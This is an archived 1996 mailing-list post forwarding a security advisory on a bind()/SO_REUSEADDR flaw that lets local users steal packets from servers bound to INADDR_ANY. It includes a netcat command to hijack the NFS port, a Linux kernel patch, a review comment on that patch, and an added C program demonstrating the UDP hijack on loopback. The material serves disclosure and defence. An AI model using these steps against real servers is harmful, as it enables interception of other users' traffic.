Date: Wed, 31 Jan 1996 23:14:58 +0100 (MET)
From: guido@gvr.win.tue.nl (Guido van Rooij)
To: FreeBSD-hackers@freefall.FreeBSD.org (FreeBSD-hackers)
Subject: bind() bug in almost all OS'es
Message-ID: <199601312214.XAA15623@gvr.win.tue.nl>
I posted this on security. This is severe in my eyes. Fortunately there is
still the concept of reserved ports but it does not help sniffing nfs ports :-(

-Guido

Aleph's K-Rad GECOS Field wrote:
> From owner-freebsd-security@freefall.freebsd.org  Wed Jan 31 16:00:48 1996
> X-Authentication-Warning: suburbia.net: majordom set sender to owner-best-of-security using -f
> Date: Tue, 30 Jan 1996 15:18:21 -0800 (PST)
> From: "Aleph's K-Rad GECOS Field" <aleph1@underground.org>
> To: linux-security@tarsier.cv.nrao.edu
> cc: linux-alert@tarsier.cv.nrao.edu, bugtraq@crimelab.com,
>     best-of-security@suburbia.net
> Subject: BoS: bind() Security Problems
> Message-ID: <Pine.LNX.3.91.960130151057.4068A-100000@underground.org>
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> Reply-To: nobody@mail.uu.net
> Sender: owner-security@FreeBSD.org
> Precedence: bulk
>
>
> System Call:                 bind()
> Affected Operating System:   Linux, SunOS, FreeBSD, BSDI, Ultrix
>                              Probably others.
> Requirement:                 account on system.
> Security Compromise:         Stealing packets from
>                              nfsd, yppasswd, ircd, etc.
> Credits:                     *Hobbit* <hobbit@avian.org>
>                              bitblt <bitblt@infosoc.com>
>                              Aleph One <aleph1@underground.org>
> Synopsis:                    bind() does not properly check
>                              to make sure there is not a socket
>                              already bound to INADDR_ANY on the same
>                              port when binding to a specific address.
>
> On most systems, a combination of setting the SO_REUSEADDR
> socket option, and a call to bind() allows any process to bind to
> a port to which a previous process has bound with INADDR_ANY. This
> allows a user to bind to the specific address of a server bound to
> INADDR_ANY on an unprivileged port, and steal its udp packets/tcp
> connection.
>
> Exploit:
>
> Download and compile netcat from ftp://ftp.avian.org/src/hacks/nc100.tgz
> Make sure an nfs server is running:
>
> w00p% netstat -a | grep 2049
> udp        0      0  *.2049                 *.*                    LISTEN
>
> Run netcat:
>
> w00p% nc -v -v -u -s 192.88.209.5 -p 2049
> listening on [192.88.209.5] 2049 ...
>
> Wait for packets to arrive.
>
> Fix:
>
> Linux: A patch has been sent to Linus and Alan Cox. It should be
> included with 1.3.60. My original patch (included below) allows for
> binds from the same uid, as some virtual hosting software like modified
> httpds, and ftpds, may break otherwise.
>
> Alan didn't like this, so all binds to the same port will
> not be allowed in newer kernels.
You should be able to easily adapt > this patch or Alan's patch to 1.2.13 without much trouble. > > Others: Pray to your vendors. > > --- begin patch --- > > > diff -u --recursive --new-file linux-1.3.57/net/ipv4/af_inet.c linux/net/ipv4/af_inet.c > --- linux-1.3.57/net/ipv4/af_inet.c Mon Dec 25 20:03:01 1995 > +++ linux/net/ipv4/af_inet.c Tue Jan 16 19:46:28 1996 > @@ -46,6 +46,8 @@ > * Germano Caronni : Assorted small races. > * Alan Cox : sendmsg/recvmsg basic support. > * Alan Cox : Only sendmsg/recvmsg now supported. > + * Aleph One : Rogue processes could steal packets > + * from processes bound to INADDR_ANY. > * > * This program is free software; you can redistribute it and/or > * modify it under the terms of the GNU General Public License > @@ -899,6 +901,12 @@ > > if (sk2->num != snum) > continue; /* more than one */ > + if ((sk2->rcv_saddr == 0 || sk->rcv_saddr == 0) && > + current->euid != sk2->socket->inode->i_uid) > + { > + sti(); > + return(-EADDRINUSE); > + } > if (sk2->rcv_saddr != sk->rcv_saddr) > continue; /* socket per slot ! -FB */ > if (!sk2->reuse || sk2->state==TCP_LISTEN) > > > Aleph One / aleph1@underground.org > http://underground.org/ > KeyID 1024/948FD6B5 > Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 > > > >
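Review bot: the new uid test in the second hunk of af_inet.c returns EADDRINUSE before the existing "if (!sk2->reuse || sk2->state==TCP_LISTEN)" test, so it now also rejects a bind when another uid's same-port socket is neither listening nor lacking SO_REUSEADDR (for example a TCP endpoint still lingering on the port after close), which the original loop would have let through; if that widening is intended, say so in the new comment, otherwise place the check after the reuse/state test or skip sockets that are already dead. The expression sk2->socket->inode->i_uid is also evaluated with no check that sk2->socket is still attached to the lingering socket, and should be guarded before being dereferenced. Finally, as the covering text says is deliberate for virtual hosting, the check only protects across uids: a second process running under the daemon's own uid can still bind the specific address and take its packets, and the header comment added in the first hunk ("Rogue processes could steal packets from processes bound to INADDR_ANY") should state that limitation so later readers do not take the patch as a full fix.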
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199601312214.XAA15623>
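The UDP case of the hijack described above, as an added example that is not part of the original post, Guido's reply, or any vendor's kernel code: a self-contained C program plays both sides in one process. A "server" socket binds INADDR_ANY on a kernel-assigned port (standing in for *.2049), a "thief" socket then tries to bind 127.0.0.1 on the same port, and a third socket sends one datagram to 127.0.0.1:port so we can see which of the two receives it. The function and constant names (hijack_attempt, bind_udp, HIJACK_*) are mine, the loopback address replaces 192.88.209.5, and the expected outcome on a current Linux kernel is an assumption stated in the comments: the thief's bind() is refused with EADDRINUSE unless both sockets set SO_REUSEADDR, and when both do, the specific-address socket wins the lookup and the server's datagram is stolen.

```c
/* Added example, not from the original post: reproduces the SO_REUSEADDR /
 * INADDR_ANY bind() hijack for UDP on the loopback interface. */
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <unistd.h>

enum hijack_result {
    HIJACK_ENV_ERROR   = -1, /* socket setup itself failed (sandbox, no loopback) */
    HIJACK_REFUSED     = 0,  /* thief's bind() got EADDRINUSE: the server is safe */
    HIJACK_STOLE       = 1,  /* thief bound and received the server's datagram */
    HIJACK_SERVER_KEPT = 2,  /* thief bound, but the kernel delivered to the server */
    HIJACK_LOST        = 3   /* thief bound, nobody received the datagram in 1 s */
};

/* Create a UDP socket, optionally set SO_REUSEADDR, and bind it to addr:port
 * (addr already in network byte order). Returns the fd, or -1 with errno kept. */
static int bind_udp(in_addr_t addr, uint16_t port, int reuse)
{
    struct sockaddr_in sa;
    int one = 1, saved, fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (fd < 0)
        return -1;
    if (reuse && setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one) < 0)
        goto fail;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = addr;
    sa.sin_port = htons(port);
    if (bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0)
        goto fail;
    return fd;
fail:
    saved = errno;
    close(fd);
    errno = saved;
    return -1;
}

/* Wait up to one second for a datagram on either fd; return the readable fd
 * (thief first if both are ready) or -1 on timeout. */
static int wait_readable(int server, int thief)
{
    fd_set rd;
    struct timeval tv = { 1, 0 };
    int maxfd = server > thief ? server : thief;
    FD_ZERO(&rd);
    FD_SET(server, &rd);
    FD_SET(thief, &rd);
    if (select(maxfd + 1, &rd, NULL, NULL, &tv) <= 0)
        return -1;
    return FD_ISSET(thief, &rd) ? thief : server;
}

/* One attack attempt; each flag says whether that side sets SO_REUSEADDR. */
int hijack_attempt(int server_reuse, int thief_reuse)
{
    struct sockaddr_in bound, dst;
    socklen_t len = sizeof bound;
    char buf[16];
    int server, thief, sender, winner, result;

    /* 1. The victim: wildcard bind on a kernel-chosen port (in place of 2049). */
    server = bind_udp(htonl(INADDR_ANY), 0, server_reuse);
    if (server < 0 || getsockname(server, (struct sockaddr *)&bound, &len) < 0) {
        if (server >= 0) close(server);
        return HIJACK_ENV_ERROR;
    }

    /* 2. The thief: same port, but bound to one specific local address.
     * Assumed Linux behaviour: EADDRINUSE unless both sides set SO_REUSEADDR. */
    thief = bind_udp(htonl(INADDR_LOOPBACK), ntohs(bound.sin_port), thief_reuse);
    if (thief < 0) {
        result = (errno == EADDRINUSE) ? HIJACK_REFUSED : HIJACK_ENV_ERROR;
        close(server);
        return result;
    }

    /* 3. A client sends one datagram to 127.0.0.1:port, as an NFS client would. */
    memset(&dst, 0, sizeof dst);
    dst.sin_family = AF_INET;
    dst.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    dst.sin_port = bound.sin_port;
    sender = socket(AF_INET, SOCK_DGRAM, 0);
    if (sender < 0 || sendto(sender, "probe", 5, 0, (struct sockaddr *)&dst, sizeof dst) != 5) {
        close(server); close(thief);
        if (sender >= 0) close(sender);
        return HIJACK_ENV_ERROR;
    }

    /* 4. Who got it? The specific-address socket is the more exact match. */
    winner = wait_readable(server, thief);
    if (winner < 0) {
        result = HIJACK_LOST;
    } else {
        (void)recv(winner, buf, sizeof buf, MSG_DONTWAIT);
        result = (winner == thief) ? HIJACK_STOLE : HIJACK_SERVER_KEPT;
    }
    close(server); close(thief); close(sender);
    return result;
}

int main(void)
{
    static const char *names[] = { "refused (EADDRINUSE)", "STOLEN by thief",
                                   "server kept it", "lost" };
    int combos[4][2] = { {0, 0}, {0, 1}, {1, 0}, {1, 1} };
    for (int i = 0; i < 4; i++) {
        int r = hijack_attempt(combos[i][0], combos[i][1]);
        printf("server SO_REUSEADDR=%d  thief SO_REUSEADDR=%d  -> %s\n",
               combos[i][0], combos[i][1], r < 0 ? "environment error" : names[r]);
    }
    return 0;
}
```

The three refused rows are the point for a defender reviewing a daemon: a UDP server that does not set SO_REUSEADDR on a wildcard socket cannot have its port taken by another local process on Linux, whereas one that does set it (common copy-paste in network code) recreates the 1996 situation for any local user, and the only remaining protection is the reserved-port rule Guido mentions, which does not apply above port 1023. Run as a normal user; no privileges or external network are needed.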